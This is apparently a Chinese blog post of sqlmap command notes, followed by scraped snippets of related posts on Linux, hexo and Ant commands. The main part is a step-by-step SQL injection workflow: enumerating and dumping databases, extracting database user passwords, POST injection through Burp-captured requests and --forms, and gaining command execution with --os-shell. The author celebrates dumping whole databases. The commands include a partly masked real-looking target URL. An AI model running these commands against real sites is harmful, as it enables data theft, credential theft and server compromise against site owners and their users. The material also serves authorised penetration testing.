sqlmap 命令笔记

基础命令 注入 MySQL

mssql access 直接爆表.然后你懂的
BT5里面的话前面就要加python
sqlmap.py -u url --dbs //爆数据库
sqlmap.py -u url --current-db //爆当前库
sqlmap.py -u url --current-user //爆当前用户
sqlmap.py -u url --users 查看用户权限
sqlmap.py -u url --tables -D 数据库 //爆表段
sqlmap.py -u url --columns -T 表段 -D 数据库 //爆字段
sqlmap.py -u url --dump -C 字段 -T 表段 -D 数据库 //猜解
sqlmap.py -u url --dump --start=1 --stop=3 -C 字段 -T 表段 -D 数据库 //猜解1到3的字段

翻回来也可以

sqlmap.py -u url 判断
sqlmap.py -u url --is-dba -v 这是判断当前数据库的使用者是否是dba
sqlmap.py -u url --users -v 0 这句的目的是列举数据库的用户
sqlmap.py -u url --passwords -v 0 这句的目的是获取数据库用户的密码
sqlmap.py -u url --privileges -v 0 这是判断当前的权限
sqlmap.py -u url --dbs -v 0 这句的目的是将所有的数据库列出来
sqlmap.py -u url --tables -D ‘表‘ 爆表
sqlmap.py -u url --columns -T ‘表’-D ‘数据库’爆列
sqlmap.py -u url --dump -T ‘表‘ --start 1 --stop 4 -v 0 这里是查询第2到第4行的内
sqlmap.py -u url --dump -all -v 0

POST注入
第一种利用burp抓包然后使用sqlmap -r 来进行检测注入

先burp抓post的包 把抓到的信息放到sqlmap 目录下 名字 clay.txt代替
sqlmap.py -r post.txt //开始post注入
sqlmap.py -r post --dbs

第二种比较简单,直接使用sqlmap --forms 这个参数就可以了
sqlmap.py -u "url" --forms
sqlmap.py -u "url" --forms --os-shell
惊奇的发现,注入点可以进行命令执行
权限:nt authority\network service
这儿我们将所有的库导出来,我想这就是前段时间盛传的脱裤吧,在执行这项操作的时候,会把所有的表里的内容导入到当前的一个目录下,看着清楚明了,但是花费的时间和很长。
sqlmap -u "http://www.xxxxxe.com/xxxxsphp?class=news&id=5&page=1&catalog_id=2" --users --password 爆用户密码

时间: 2024-11-18 15:16:33

sqlmap 命令笔记的相关文章

linux命令笔记

3步实现ssh login不用密码: 1 ssh-keygen  (Create public and private keys) 2 ssh-copy-id -i ~/.ssh/id_rsa.pub remote-host    (Copy the public key to remote-host) 3 ssh remote-host    (不用密码了) linux命令笔记,布布扣,bubuko.com

linux基础命令--笔记

linux基础命令--笔记 一.   1  . --help 命令简单帮助 2. man 查看命令复杂帮助  (非内置命令) 3  . help (bash的内置命令)如 :help cd  .help pwd   help  内置命令可用man cd  等查看. 4  . ls==list 查看目录列表 5 .  mkdir   == make directory  创建目录.例如:mkdir /date -p 递归创建目录 :mk 6  .  cd      ==change directo

hexo常用命令笔记

hexo npm install -g hexo npm update -g hexo hexo init 常用 hexo n == hexo new "a new post" 新建文章,最好用双引号括起来 hexo g == hexo generate 生成静态文件到public文件夹 hexo s == hexo server Server at localhost:4000,根目录为public hexo d == hexo deploy 部署到远程服务里,例如github he

lunux命令笔记

文件查看命令 ls / -lh ls list / 路径 -l 详细 -lh 详细的人性化显示 -ld 显示目录 -i 显示i节点 mkdir /tmp/mulu/mulu2 /tmp/ma/mb -p -p 递归创建目录 目录处理命令 cd /tmp 进入目录 cd .. 返回上一级目录 pwd 显示当前所在目录 cp -r [原文件或目录] [目标文件或目录] cp 复制 -r 复制目录 -p 保存原来文件的属性 mv [原文件或目录] [目标文件或目录] mv 移动或剪切 文件处理命令 r

Linux/Unix mac 命令笔记

bg和fg Linux/Unix 区别于微软平台最大的优点就是真正的多用户,多任务.因此在任务管理上也有别具特色的管理思想.我们知道,在 Windows 上面,我们要么让一个程序作为服务在后台一直运行,要么停止这个服务.而不能让程序在前台后台之间切换.而 Linux 提供了 fg 和 bg 命令,让你轻松调度正在运行的任务. 假设你发现前台运行的一个程序需要很长的时间,但是需要干其他的事情,你就可以用 Ctrl-Z ,挂起这个程序,然后可以看到系统提示:[1]+ Stopped /root/bi

Ant-常用命令(笔记二)

1.copy命令: <?xml version="1.0" encoding="utf-8"?> <project name="copyFile" default="copyToOtherPath"> <!-- 复制单个文件--> <target name="copyTaget"> <copy file="mmmt.txt" tofi

SQLmap 使用笔记

SQLMap 的常用语法 1.sqlmap.py -u "www.xxx.com/news.asp?id=1"// 检查注入点 2.sqlmap.py -u "www.xxx.com/news.asp?id=1" --current-user// 获取当前用户名 3.sqlmap.py -u "www.xxx.com/news.asp?id=1" --current-db//获取数据库名,得到库admin 4.sqlmap.py -u "

sqlmap使用笔记

前整理的 方便查阅 有错误的指出 顺便注:文中部分是– 而不是—— (这个不是我不愿意修改,而是网站系统的问题,实在抱歉,请大家在复制语句之后手工修改.:) ) -u #注入点-f #指纹判别数据库类型-b #获取数据库版本信息-p #指定可测试的参数(?page=1&id=2 -p “page,id”)-D “” #指定数据库名-T “” #指定表名-C “” #指定字段-s “” #保存注入过程到一个文件,还可中断,下次恢复在注入(保存:-s “xx.log” 恢复:-s “xx.log”

4.羽翼sqlmap学习笔记之Post登录框注入

4.Sqlmap系列教程——post登录框注入注入点: http://xxx.xxx.com/Login.asp 注入方式一: 1.对着注入点使用burp抓包,保存txt格式文件. 2.输入命令: ./sqlmap.py -r search-test.txt -p tfUPass 注入方式二:自动搜索表单的方式 sqlmap -u http://xxx.xxx.com/Login.asp --forms 注入方式三:指定一个参数的方法 sqlmap -u http://xxx.xxx.com/L